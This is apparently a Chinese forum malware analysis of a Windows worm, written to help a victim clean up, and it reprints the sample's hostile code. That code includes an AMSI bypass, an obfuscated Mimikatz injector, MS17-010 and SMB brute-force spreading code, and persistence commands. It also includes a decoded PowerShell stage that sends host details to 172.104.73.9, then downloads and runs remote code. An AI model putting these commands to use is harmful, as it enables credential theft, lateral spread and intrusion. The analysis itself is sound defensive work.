可以按照分析的清理就行,不是很難,已經全部分析完了,包括本地文件和云端的部分樣本。病毒不是很難,這病毒最牛逼的地方在于,自動化掃描攻擊。通過cmd開啟65531 32 33端口,來標記該機器是否已經被感染。
分析該樣本需要先看一下powershell反混淆。地址是[url]http://rvasec.com/slides/2017/Bohannon_Daniel--RVAsec_2017.pptx[/url],下載ppt學習一下就行
1. powershell作用。
關閉amis(防病毒接口) [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true),具體可以參考 https://www.anquanke.com/post/id/162924
Get-Win32Types函數的作用
通過分析可知,該函數的作用時通過powershell,手工構造一個pe文件。例如
${TYpEBUiLdER} = ${MOdULEbUIldEr}.DefineEnum(('SubSystemType'), ('Public'), [UInt16])
${tyPeBuiLDEr}.DefineLiteral(('IMAGE_SUBSYSTEM_UNKNOWN'), [UInt16] 0) | Out-Null
${tYpEbUILdER}.DefineLiteral(('IMAGE_SUBSYSTEM_NATIVE'), [UInt16] 1) | Out-Null
${TypeBuILdER}.DefineLiteral(('IMAGE_SUBSYSTEM_WINDOWS_GUI'), [UInt16] 2) | Out-Null
${TYpeBuildER}.DefineLiteral(('IMAGE_SUBSYSTEM_WINDOWS_CUI'), [UInt16] 3) | Out-Null
${TYPebUiLDer}.DefineLiteral(('IMAGE_SUBSYSTEM_POSIX_CUI'), [UInt16] 7) | Out-Null
${TYPeBUiLDER}.DefineLiteral(('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI'), [UInt16] 9) | Out-Null
${TyPebuILdEr}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_APPLICATION'), [UInt16] 10) | Out-Null
${TyPEbUIlDEr}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER'), [UInt16] 11) | Out-Null
${TypEBUiLdER}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER'), [UInt16] 12) | Out-Null
${tyPeBUiLDer}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_ROM'), [UInt16] 13) | Out-Null
${TyPebuIlDer}.DefineLiteral(('IMAGE_SUBSYSTEM_XBOX'), [UInt16] 14) | Out-Null
具體可以參考 https://docs.microsoft.com/en-us/windows/desktop/debug/pe-format,這里不在詳述。
Get-Win32Constants 函數的作用,該函數的作用是設置剛才構造的PE文件的值。
Get-Win32Functions函數 該函數作用是加載系統DLL中的函數,方便powershell調用系統函數
Sub-SignedIntAsUnsigned函數 該函數是將有符號的int相減,并將結果轉換為無符號的int
Add-SignedIntAsUnsigned函數 該函數是將有符號的int相加,并將結果轉換為無符號整數
Compare-Val1GreaterThanVal2AsUInt函數 比較兩個整數是否相等
Convert-UIntToInt函數 無符號整數轉換有符號整數
Test-MemoryRangeValid函數 測試申請的內存區域是否可用
Write-BytesToMemory函數 將bytes寫入內存中
Get-ProcAddress 相當于直接調用GetProcAddress 函數,檢索指定的動態鏈接庫(DLL)中的輸出庫函數地址
Enable-SeDebugPrivilege 啟動給定進程的sedebug權限。該ps文件向內存釋放mimikatz的pe可執行文件后,向這個被釋放的線程開啟sedebug權限,不然mimiakatz是無法運行的
Invoke-CreateRemoteThread 調用其他進程的線程
其他一些函數,大多數是獲取PE文件頭,倒入表 導出表的函數了
main函數很簡單,從第2644行開始。前幾行主要作用是要執行什么命令。pebYtes64這個變量中存儲的是mimikatz經過base64編碼后的內容。隨后判斷一下computername,去分別執行核心功能REMOtEsCRiPTBlOCK的代碼。這個我沒看出來有什么區別。
核心功能REMOtEsCRiPTBlOCK,的main函數在2468行。該函數的作用是向指定進程中注入mimikatz,然后在被注入的進程中執行mimikatz。推測小黑可能是在網上找到的使用腳本,參照https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1,做了一下簡單的混淆。可以看出混淆只是將關鍵字改成字符串拼接或者大小寫混用。沒有實質性變化
該powershell的危害:
通過mimikatz讀取系統密碼和系統可能保存的私鑰,方便做橫向移動
-
收集系統信息
除此之外,該powershell文件中釋放的mimikatz沒有落地,只在內存中運行,也沒有留下后門等。
2. svchost2.exe
拖到IDA,發現這個exe的作用只是啟動一個名叫Ddriver,然后調用signed int sub_40E8F0這個函數
在這個函數中,首先調用sub_40E3D0,然后調用sub_40D280這個函數,寫入一個C:\\windows\\temp\\ttt.exe這個文件
然后回到sub_40E3D0,執行cmd /c taskkill /f /im svhost.exe /im svhhost.exe /im svvhost.exe & move /y c:\\windows\\temp\\svvhost.exe c:\\windo" "ws\\temp\\svchost.exe & del c:\\windows\\system32\\svhhost.exe & del c:\\windows\\syswow64\\svhhost.exe
就是調用taskkill干掉svhost,然后刪除。而windows中正確的名字是svchost,故意是干掉競爭對手吧。隨后將c:\\windows\\temp\\svvhost.exe移動到 c:\\windo" "ws\\temp\\svchost.exe ,偽造svchost。這里推薦老哥想一下辦法,修復就行。然后又通過wmic,刪掉svhhost進程。
執行如下cmd cmd /c wmic process where \"ExecutablePath like '%%drivers%%' and name='taskmgr.exe'\" delete & wmic process where \"" "ExecutablePath like '%%drivers%%' and name='svchost.exe'\" delete & wmic process where \"ExecutablePath like '%%emp%" "%' and name='svchost.exe'\" delete
刪除windows任務管理器,干掉可執行路徑在driver和temp中的svchost,估計是為了更好的隱藏病毒本體吧
執行如下cmd cmd /c netsh interface ipv6 install&netsh firewall add portopening tcp 65532 UDP&netsh interface portproxy add v4tov" "4 listenport=65532 connectaddress=1.1.1.1 connectport=53&netsh firewall add portopening tcp 65531 UDP2&netsh interfa" "ce portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53&netsh firewall add portopening tcp 65" "533 ShareService
解釋一下 首先安裝ipv6,然后設置防火墻打開udp 65532,然后設置v4tov4,也就是ipv4 代理 ,具體參見 https://www.cnblogs.com/xbblogs/p/7118203.html
隨后就是設置一些亂七八糟的東西。推薦老哥重點看一下C:\\windows\\system32中是否有svhost這個文件,這個是病毒哈。
然后設置計劃任務,代碼貼出來,老哥根據這個刪除就行 cmd /c start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&(schtasks /delete /TN %s /f&scht" "asks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN %s /tr \"cmd.exe /c %s\"&schtasks /run /TN %s
然后設置注冊表,位置貼出來,老哥刪除即可Software\\Microsoft\\Windows\\CurrentVersion\\Run,看一下在這個子目錄中又沒有可疑地key,應該是Driver。刪除就行
回到 sub_40E8F0中,這里主要是啟動任務啥的,看圖,刪除就行
scvhost2的危害:
- 一大堆落地文件,修改注冊表,計劃任務,建議刪除
3. svchost1 分析
這個8MB的exe文件一看就不是好人。先扔到IDA中,發現有python字樣。查看string,發現py2exe。這就說明該exe有很大幾率是使用python寫成的,打包為exe。我們可以使用unpy2exe這個工具還原python代碼,參考 https://github.com/matiasb/unpy2exe。然后還原PYC文件就行,
vi看一下還原的文件,其實就是一個python掃描MS17-010的腳本。
附件是還原過后的py文件,不允許上傳py文件,所以我改成txt了,自行下載后后綴改成py就行
該py首先會綁定本機的60124端口。推測是做互斥體。系統中只能允許運行一個掃描工具。
代碼從1090行開始,首先檢測如果本機存在k8h3d這個用戶,則刪除掉。然后設計掃描計劃任務,如果本機已經被感染,則讀取本地病毒文件,如果沒有被感染,則從云端下載病毒代碼,然后準備開始傳播。
首先通過wmic ntdomain get domainname,檢測一下是否加域。如果加域的話,將域的用戶名和密碼加入到破解口令列表中。這個列表中存儲著常見的弱口令
然后通過findip這個函數,獲取主機的ip,網段一類的信息。然后調用scansmb這個函數,這個函數調用scan2函數去檢測目標是否開放445。病毒會打開65533端口,如果被掃描的機器打開了65533端口,那就說明已被感染。隨后調用validate這個函數
validate函數主要的作用是,通過弱口令密碼表,爆破SMB服務。爆破成功的話,將該掃描工具復制到被攻擊的機器上運行。
def validate(ip):
for u in userlist2:
for p in passlist:
if u == '' and p != '':
continue
for d in domainlist:
if PSEXEC(ee2, dl, 'cmd.exe /c c:\\windows\\temp\\svchost.exe', u, p, d).run(ip):
print 'SMB Succ!'
return
這是入侵的一種。第二種是通過findip獲取網段 ip信息后,調用check_thread這個函數去打ms17-010。所以你會發現這段py代碼其實就是python版ms17010的攻擊代碼,參見https://github.com/worawit/MS17-010/blob/master/zzz_exploit.py
入侵成功后,會在目標機器上執行smb_pwn函數中的代碼。直接吧攻擊代碼貼出來,大家就知道怎么解決這個病毒了
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
if os.path.exists('c:/windows/system32/svhost.exe'):
eb = 'c:\\windows\\system32\\svhost.exe'
if os.path.exists('c:/windows/SysWOW64/svhost.exe'):
eb = 'c:\\windows\\SysWOW64\\svhost.exe'
if os.path.exists('c:/windows/system32/drivers/svchost.exe'):
eb = 'c:\\windows\\system32\\drivers\\svchost.exe'
if os.path.exists('c:/windows/SysWOW64/drivers/svchost.exe'):
eb = 'c:\\windows\\SysWOW64\\drivers\\svchost.exe'
service_exec(conn, 'cmd /c net share c$=c:')
smb_send_file(smbConn, eb, 'c', '/installed.exe')
if os.path.exists('c:/windows/temp/svvhost.exe'):
ee = 'c:\\windows\\temp\\svvhost.exe'
if os.path.exists('c:/windows/temp/svchost.exe'):
ee = 'c:\\windows\\temp\\svchost.exe'
smb_send_file(smbConn, ee, 'c', '/windows/temp/svchost.exe')
bat = 'cmd /c c:\\installed.exe&c:\\installed.exe&echo c:\\installed.exe >c:/windows/temp/p.bat&echo c:\\windows\temp\\svchost.exe >>c:/windows/temp/p.bat&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2 >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65531 DNSS2 >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\\Microsoft\\windows\\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F) else start /b sc start Schedule^&ping localhost^&sc query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%"^&schtasks /run /TN Autocheck^) >>c:/windows/temp/p.bat&echo net start Ddriver >>c:/windows/temp/p.bat&echo for /f %%i in (\'tasklist ^^^| find /c /i "cmd.exe"\'^) do set s=%%i >>c:/windows/temp/p.bat&echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&echo net user k8h3d /del >>c:/windows/temp/p.bat&echo del c:\\windows\\temp\\p.bat>>c:/windows/temp/p.bat&cmd.exe /c c:/windows/temp/p.bat'
service_exec(conn, bat)
危害:
1. 自動化掃描攻擊,主動攻擊局域網中其他的主機
下面說一下怎么清除這個病毒:
自己看看smb_pwn函數中的代碼,刪除相關落地的文件就行
下面說一下云端代碼,首先去http://v.beahh.com/v下載powershell代碼,該代碼經過gzinflate(base64_decode編碼,所以寫一段php解密,解密后的內容如下
.( $Env:COMSpEc[4,15,25]-jOIn'')( ((("{4}{28}{19}{23}{15}{46}{38}{27}{56}{47}{10}{62}{35}{29}{59}{16}{60}{0}{34}{55}{37}{13}{57}{52}{6}{50}{18}{61}{2}{36}{43}{45}{53}{22}{26}{31}{51}{1}{49}{21}{20}{54}{14}{7}{5}{40}{17}{58}{25}{30}{3}{39}{42}{24}{63}{11}{44}{8}{41}{32}{48}{12}{9}{33}" -f'JUpnV+WdSzp2k+','fYruj1+8On39Ff2ieKsA1nmzVgFcFtkCc8Sz3dTE1iti1d9/796yuKIJolc','BPRvR//YReMbxC','L','Invoke-Expression {1}(New-','/w/yMT','34O1lbfraf4uL8t83ozxm+3gcFkVNFdFuV','qzK8Wo1+2lwJLFOj2cUWFypE6P9Ps+e/hT4Zud++tknKWNrZENYH9y0FNb/Rfn2LRTo+vpimZ1fLKvZev4DZn0CYbm','/','ion.CompressionMode]::Decompress)), [Text.Encoding]:','N9k9mr86ySXmapveqn/x9jus03Uo/Su+kdx7e+/6rbD793vc/f3H26s3r743u7N2XTz452Ndf7uknW1un0+NyldfjOx//zMejj19effWx99Hv9vHozsPdXX1p','/S+/9/HW1p2','0})))), [IO.Compress','7O/rd2aF63Vnlevn706PuzLK/nb8Y0Qv2N5qC5fv09','J5','rt]::Fr','qGf5dvaQPty6WRd2+5q+uqqf0+','3oIFNKv2ydf/ku','XbQYz6al',' IO.Compr','yR','yF+pYlui/m0Pn79pfb0miaxzWiOvuSuvqu8YPoBuT9riwlAfEL','1/5z7Nz','ession.DeflateStream ({1}(New-Object IO.MemoryStream (,{1}([Conve','a2sX8D7G85ra/OTrk/TLZ3d','bJHxfNOCQT9XqDQYvE','Thv','HYBxJliUmL23Ke39K9UrX4HShCIBgE','Object IO.StreamReader ({1}(New-Object','66brfTeZutrlYvP/7k43SRt2fbV/mLH0OTX3xdt/0Xfwl/d4c62JtlVbmk16','1fv7jOylVTwFBN1zOiR7Oui58s2uWxYZQ9YvVlfn','s9lqPfvpNf39CY8/bx9dLn','v0428tZq++9fGd8TL7Iv/evdHu7mjv+9s/X',':ASCII)).ReadToEnd();
','LS','22z6S/B7Xhbnab','nP1sltEHwo','np8VW+vPtwfO/BeH9nd7z3YPfu3Uertp0D/mepPw7B6c','{0}7b0','dFtCgr2m','MPdErL801kHhyj1DnN19ZVM8fcvqd33zGsdtD/5BN+mh+1yXZ2MtVFbskqTb3bQFf22VVfn+tIuDeCCxJ','n+vd3vPT17Xp7Om9/tk+/T74X8Tk7YGG7YYfoL062ti8','q2qqqiTzZqgGALisRio0lx52T4y9IH1Hf2epdrk2rbfpR5g3RHF/XOanSb2+nl83J9qKqn9HEXC6rE0zJbto2dXG+ne6mq+Lt','EdZlG4HxOze4yoTHjnzh0VBhaK7bbJ2620rZbbW+lsmW2nwIOwX','Pf++PP','ILr168wx/lyO23','omBase64String(','51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8imvz','RUvPv74Trq1/Z0vixf0Unpx2m6ftaeLNP3JrC6OnzzPHxm/7s74J7PnX51+D2Mej7e3btV6XJ6+uHgzv5N+P73zGyf/Dw=={','xR8Xiuyp4UFL0f0DhV2cK5yIrz10He/hTv','plY/4+JcIsqum2R3lCLXhJ/l2sm/Ed+gcscbHMS0OP1TZA6Nt5vW6y/AsmTt7UhEa9n','MZJtFUCUIwDU0Cpv+CvgCX0g9m1FlZDTEqNfks3fOIGwICFGBUlrNhVu+8','Ht5ZLdrf','w160YCWiGvLS1dV50pG','Ihdujepf36Zftr3myYrT4yEWTCCKahLABjYZUZYMvjLjD+YZgvzCf36C6U5kVOoD0r2OJK+vQB/84i/L6rxe2g','7r/PV2m3++JXDu/R7Lqv','yTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O','aS7/','ny3PxvkiW47v','6','fhOu8yL8mSSf3fc5i/Sdpr/9ORL9LKV/t6nZz8mfeVNmTvQ9/T9mQ+0MR8OQAQOAdDr/C29n36S5j8oGvmNgH2Gv34h/UJ/Nus2a1+P78jP9Lqt81VVv9xO27p6nd','cX8ROj1mZkBQ4PdjTSgzjpkAE90+q','z/62c9B7fe9ht9edHdP8U/vbAwPCe3O/i+/HX+z/Xj4Wv3GC/37JL55P','TSGC2aPMLYCC82uE44StBTr+id8Jv')) -f [ChAR]39,[ChAR]36) )
然后參考fireeye的一篇關于講解powershell混淆的文章,寫出如下py腳本解密
s = """JUpnV+WdSzp2k+','fYruj1+8On39Ff2ieKsA1nmzVgFcFtkCc8Sz3dTE1iti1d9/796yuKIJolc','BPRvR//YReMbxC','L','Invoke-Expression {1}(New-','/w/yMT','34O1lbfraf4uL8t83ozxm+3gcFkVNFdFuV','qzK8Wo1+2lwJLFOj2cUWFypE6P9Ps+e/hT4Zud++tknKWNrZENYH9y0FNb/Rfn2LRTo+vpimZ1fLKvZev4DZn0CYbm','/','ion.CompressionMode]::Decompress)), [Text.Encoding]:','N9k9mr86ySXmapveqn/x9jus03Uo/Su+kdx7e+/6rbD793vc/f3H26s3r743u7N2XTz452Ndf7uknW1un0+NyldfjOx//zMejj19effWx99Hv9vHozsPdXX1p','/S+/9/HW1p2','0})))), [IO.Compress','7O/rd2aF63Vnlevn706PuzLK/nb8Y0Qv2N5qC5fv09','J5','rt]::Fr','qGf5dvaQPty6WRd2+5q+uqqf0+','3oIFNKv2ydf/ku','XbQYz6al',' IO.Compr','yR','yF+pYlui/m0Pn79pfb0miaxzWiOvuSuvqu8YPoBuT9riwlAfEL','1/5z7Nz','ession.DeflateStream ({1}(New-Object IO.MemoryStream (,{1}([Conve','a2sX8D7G85ra/OTrk/TLZ3d','bJHxfNOCQT9XqDQYvE','Thv','HYBxJliUmL23Ke39K9UrX4HShCIBgE','Object IO.StreamReader ({1}(New-Object','66brfTeZutrlYvP/7k43SRt2fbV/mLH0OTX3xdt/0Xfwl/d4c62JtlVbmk16','1fv7jOylVTwFBN1zOiR7Oui58s2uWxYZQ9YvVlfn','s9lqPfvpNf39CY8/bx9dLn','v0428tZq++9fGd8TL7Iv/evdHu7mjv+9s/X',':ASCII)).ReadToEnd();
','LS','22z6S/B7Xhbnab','nP1sltEHwo','np8VW+vPtwfO/BeH9nd7z3YPfu3Uertp0D/mepPw7B6c','{0}7b0','dFtCgr2m','MPdErL801kHhyj1DnN19ZVM8fcvqd33zGsdtD/5BN+mh+1yXZ2MtVFbskqTb3bQFf22VVfn+tIuDeCCxJ','n+vd3vPT17Xp7Om9/tk+/T74X8Tk7YGG7YYfoL062ti8','q2qqqiTzZqgGALisRio0lx52T4y9IH1Hf2epdrk2rbfpR5g3RHF/XOanSb2+nl83J9qKqn9HEXC6rE0zJbto2dXG+ne6mq+Lt','EdZlG4HxOze4yoTHjnzh0VBhaK7bbJ2620rZbbW+lsmW2nwIOwX','Pf++PP','ILr168wx/lyO23','omBase64String(','51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8imvz','RUvPv74Trq1/Z0vixf0Unpx2m6ftaeLNP3JrC6OnzzPHxm/7s74J7PnX51+D2Mej7e3btV6XJ6+uHgzv5N+P73zGyf/Dw=={','xR8Xiuyp4UFL0f0DhV2cK5yIrz10He/hTv','plY/4+JcIsqum2R3lCLXhJ/l2sm/Ed+gcscbHMS0OP1TZA6Nt5vW6y/AsmTt7UhEa9n','MZJtFUCUIwDU0Cpv+CvgCX0g9m1FlZDTEqNfks3fOIGwICFGBUlrNhVu+8','Ht5ZLdrf','w160YCWiGvLS1dV50pG','Ihdujepf36Zftr3myYrT4yEWTCCKahLABjYZUZYMvjLjD+YZgvzCf36C6U5kVOoD0r2OJK+vQB/84i/L6rxe2g','7r/PV2m3++JXDu/R7Lqv','yTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O','aS7/','ny3PxvkiW47v','6','fhOu8yL8mSSf3fc5i/Sdpr/9ORL9LKV/t6nZz8mfeVNmTvQ9/T9mQ+0MR8OQAQOAdDr/C29n36S5j8oGvmNgH2Gv34h/UJ/Nus2a1+P78jP9Lqt81VVv9xO27p6nd','cX8ROj1mZkBQ4PdjTSgzjpkAE90+q','z/62c9B7fe9ht9edHdP8U/vbAwPCe3O/i+/HX+z/Xj4Wv3GC/37JL55P','TSGC2aPMLYCC82uE44StBTr+id8Jv"""
s = s.split("','")
a = ['4', '28', '19', '23', '15', '46', '38', '27', '56', '47', '10', '62', '35', '29', '59', '16', '60', '0', '34', '55', '37', '13', '57', '52', '6', '50', '18', '61', '2', '36', '43', '45', '53', '22', '26', '31', '51', '1', '49', '21', '20', '54', '14', '7', '5', '40', '17', '58', '25', '30', '3', '39', '42', '24', '63', '11', '44', '8','41', '32', '48', '12', '9', '33']
result = ""
for i in a:
result += s[int(i)]
print result
結果是
Invoke-Expression {1}(New-Object IO.StreamReader ({1}(New-Object IO.Compression.DeflateStream ({1}(New-Object IO.MemoryStream (,{1}([Convert]::FromBase64String({0}7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8imvzN9k9mr86ySXmapveqn/x9jus03Uo/Su+kdx7e+/6rbD793vc/f3H26s3r743u7N2XTz452Ndf7uknW1un0+NyldfjOx//zMejj19effWx99Hv9vHozsPdXX1pz/62c9B7fe9ht9edHdP8U/vbAwPCe3O/i+/HX+z/Xj4Wv3GC/37JL55P22z6S/B7Xhbnab66brfTeZutrlYvP/7k43SRt2fbV/mLH0OTX3xdt/0Xfwl/d4c62JtlVbmk166qGf5dvaQPty6WRd2+5q+uqqf0+fhOu8yL8mSSf3fc5i/Sdpr/9ORL9LKV/t6nZz8mfeVNmTvQ9/T9mQ+0MR8OQAQOAdDr/C29n36S5j8oGvmNgH2Gv34h/UJ/Nus2a1+P78jP9Lqt81VVv9xO27p6ndJUpnV+WdSzp2k+LS7r/PV2m3++JXDu/R7Lqvnp8VW+vPtwfO/BeH9nd7z3YPfu3Uertp0D/mepPw7B6c7O/rd2aF63Vnlevn706PuzLK/nb8Y0Qv2N5qC5fv09aS7/Ht5ZLdrf34O1lbfraf4uL8t83ozxm+3gcFkVNFdFuVplY/4+JcIsqum2R3lCLXhJ/l2sm/Ed+gcscbHMS0OP1TZA6Nt5vW6y/AsmTt7UhEa9nXbQYz6alcX8ROj1mZkBQ4PdjTSgzjpkAE90+qBPRvR//YReMbxCnP1sltEHwoEdZlG4HxOze4yoTHjnzh0VBhaK7bbJ2620rZbbW+lsmW2nwIOwXILr168wx/lyO23w160YCWiGvLS1dV50pG1/5z7NzThvs9lqPfvpNf39CY8/bx9dLnMZJtFUCUIwDU0Cpv+CvgCX0g9m1FlZDTEqNfks3fOIGwICFGBUlrNhVu+8fYruj1+8On39Ff2ieKsA1nmzVgFcFtkCc8Sz3dTE1iti1d9/796yuKIJolcxR8Xiuyp4UFL0f0DhV2cK5yIrz10He/hTvyF+pYlui/m0Pn79pfb0miaxzWiOvuSuvqu8YPoBuT9riwlAfELyRIhdujepf36Zftr3myYrT4yEWTCCKahLABjYZUZYMvjLjD+YZgvzCf36C6U5kVOoD0r2OJK+vQB/84i/L6rxe2gJ5qzK8Wo1+2lwJLFOj2cUWFypE6P9Ps+e/hT4Zud++tknKWNrZENYH9y0FNb/Rfn2LRTo+vpimZ1fLKvZev4DZn0CYbm/w/yMTMPdErL801kHhyj1DnN19ZVM8fcvqd33zGsdtD/5BN+mh+1yXZ2MtVFbskqTb3bQFf22VVfn+tIuDeCCxJ3oIFNKv2ydf/kuny3PxvkiW47vbJHxfNOCQT9XqDQYvE1fv7jOylVTwFBN1zOiR7Oui58s2uWxYZQ9YvVlfnLdFtCgr2mq2qqqiTzZqgGALisRio0lx52T4y9IH1Hf2epdrk2rbfpR5g3RHF/XOanSb2+nl83J9qKqn9HEXC6rE0zJbto2dXG+ne6mq+Lta2sX8D7G85ra/OTrk/TLZ3dTSGC2aPMLYCC82uE44StBTr+id8Jv/S+/9/HW1p2Pf++PP/n+vd3vPT17Xp7Om9/tk+/T74X8Tk7YGG7YYfoL062ti8v0428tZq++9fGd8TL7Iv/evdHu7mjv+9s/XRUvPv74Trq1/Z0vixf0Unpx2m6ftaeLNP3JrC6OnzzPHxm/7s74J7PnX51+D2Mej7e3btV6XJ6+uHgzv5N+P73zGyf/Dw=={0})))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
然后我們繼續解碼,發現是如下內容
seT-VaRIablE 3oVYAr ( " ) )93]Rahc[]GNIRTS[,)25]Rahc[+84]Rahc[+35]Rahc[((EcAlper.)'|','PwU'(EcAlper.)'$',)911]Rahc[+211]Rahc[+08]Rahc[((EcAlper.)29]Rahc[]GNIRTS[,)001]Rahc[+601]Rahc[+711]Rahc[((EcAlper.)43]Rahc[]GNIRTS[,'M4K'(EcAlper.)'
}{hctac}
elif epyt- htapwpP'+' metI-weN
{yrt
}{hctac}
}
)M4K2daoln'+'wod'+'wpPM4K(gnirtSdaolnwoD'+'.)tneilCbeW.teN tcejbO-weN( XEI
{esle}
)M4K3daolnwodwpPM4K(gnirtsdaolnwod.)tneilCbeW.teN tcejbO-'+'weN( XEI
yekwpP + eziswpP + M4K=ezis&M4K + sutatS.)sutatS ytreporP- troS PwU revirdD ecivreS-teG( + M4K3?nosj.wen/9.37.401.271//:ptthM4K = 3daolnwodwpP
)04*0001(peelS::]daerhT.gnidaerhT.metsyS[
;)pmt_daolnwodwpP(etucexellehs.cexewpP
;noitacilppa.llehs '+'moc- tcejbO-weN = cexewpP
mus.)mus- htgnel ytreporp- '+'tcejbO-erusaeM PwU esrucer- pmt_daolnwodwpP metIdlihC-teG( = eziswpP
)01*0001(peelS::]daerhT.gnidaerh'+'T.metsyS[
)M4Kpmt_daolnwodwpPM4K,M4Kdaolnwo'+'dwpPM4K(eliFda'+'olnwoD.)tneilCbeW.teN.metsyS'+' tcejbO-weN(
{)))htapwpP htap-tset( ton-( dna- )M4Kgninn'+'uRM4K en- s'+'utatS.)sutatS ytreporP- troS PwU revir'+'dD ecivreS-teG(((fi
{yrt
405exe.etadpudju405+M4Kpmet:vnewpPM4K = pmt_dao'+'lnwodwpP
yekwpP + M'+'4K3?'+'nosj.dlo/9.37.401.271//:ptthM4K '+'= 2daolnwodwpP
yekwpP + M4K3?exe.lld/9.37.401.271//:ptthM4K = daolnwodwpP
EM'+'ANRESU'+':vnewpP + M4K=resu&M4K + niamoD.)metsysretupmoc_23niw tc'+'ejbOimW-teG( +'+' '+'M4K=niamod&M4K + galfwpP + M4K=2galf&M4K + erutcetihcrASO.)metsySgnitarepO_23niW tcejbOimW-teG(+M4K=tib&M4K+noisrev.)metsySgn'+'itare'+'pO_23niW ssalC- tcejbOimW-teG(+'+'M4K'+'=rev&M4K+vawpP+M4K=va&M4K+camwpP+M4K=cam&M4K'+' = yekwpP
htapwpP htap-tset = ga'+'lfwpP]gnirts[
M4Kgol.ppdj'+'udjupmet:vnewpPM4K = htapwpP
}{hctac}
}
405YFDZ'+'405 =+ vawpP
{)M4Kgni'+'nnuRM4K qe- sutatS.)sutatS ytreporP- troS PwU uygnafgnoduhz eciv'+'reS-teG((fi
{yrt
}
svawpP = vawpP
{esle}
}
M4KP'+'wUM4K + ]vwpP[svawpP =+ vawpP
{)++vwpP ;tnuoC.svawpP tl- '+'vwpP ;0 = vwpP(rof
{)1- tg- )405tcejbO405(fOxednI.eman.)(epyTt'+'eG.svawpP(fi
emaNyalpsid.)tcudorPsuriVitnA ssalC- 2retneCytiruceSdjutoor ecapsemaN- tcejbOimW-teG( = svawpP
)CAM dn'+'apxe- tcejbo-tcelesPwUCAM redaeH- vsC-morFtrevnoC PwU1 tsrif- 1 pikS- tcejbO-tcel'+'eSPwUVSC OF/ c'+'amteg( = camwpP]gnirts[
M4KM4K = svawpP]gnirts'+'[
M4KM4K = vawpP]gnirts['(()'X'+]31[DILlEhs$+]1[DiLlEhs$ ( . " ); & ((gv '*mdR*').naMe[3,11,2]-joiN'') (-JOiN ( gEt-ItEm VariABLe:3oVYAr ).VaLUE[- 1 ..-(( gEt-ItEm VariABLe:3oVYAr ).VaLUE.lENgTh) ] )
重點看這里,我也看不懂,大致意思是將字符串反轉,OK,那我們試一下
結果如下
$av = ""
$avs = ""
$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
$avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName
if($avs.GetType().name.IndexOf('Object') -gt -1){
for($v = 0; $v -lt $avs.Count; $v++){
$av += $avs[$v] + "|"
}
}else{
$av = $avs
}
try{
if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){
$av += 'ZDFY'
}
}catch{}
$path = "$env:temp\\pp.log"
[string]$flag = test-path $path
$key = "&mac="+$mac+"&av="+$av+"&ver="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME
$download = "http://172.104.73.9/dll.exe?3" + $key
$download2 = "http://172.104.73.9/old.json?3" + $key
$download_tmp = "$env:temp"+'\update.exe'
try{
if(((Get-Service Ddriver | Sort -Property Status).Status -ne "Running") -and (-not (test-path $path))){
(New-Object System.Net.WebClient).DownloadFile("$download","$download_tmp")
[System.Threading.Thread]::Sleep(1000*10)
$size = (Get-ChildItem $download_tmp -recurse | Measure-Object -property length -sum).sum
$exec = New-Object -com shell.application;
$exec.shellexecute($download_tmp);
[System.Threading.Thread]::Sleep(1000*40)
$download3 = "http://172.104.73.9/new.json?3" + (Get-Service Ddriver | Sort -Property Status).Status + "&size=" + $size + $key
IEX (New-Object Net.WebClient).downloadstring("$download3")
}else{
IEX (New-Object Net.WebClient).DownloadString("$download2")
}
}catch{}
try{
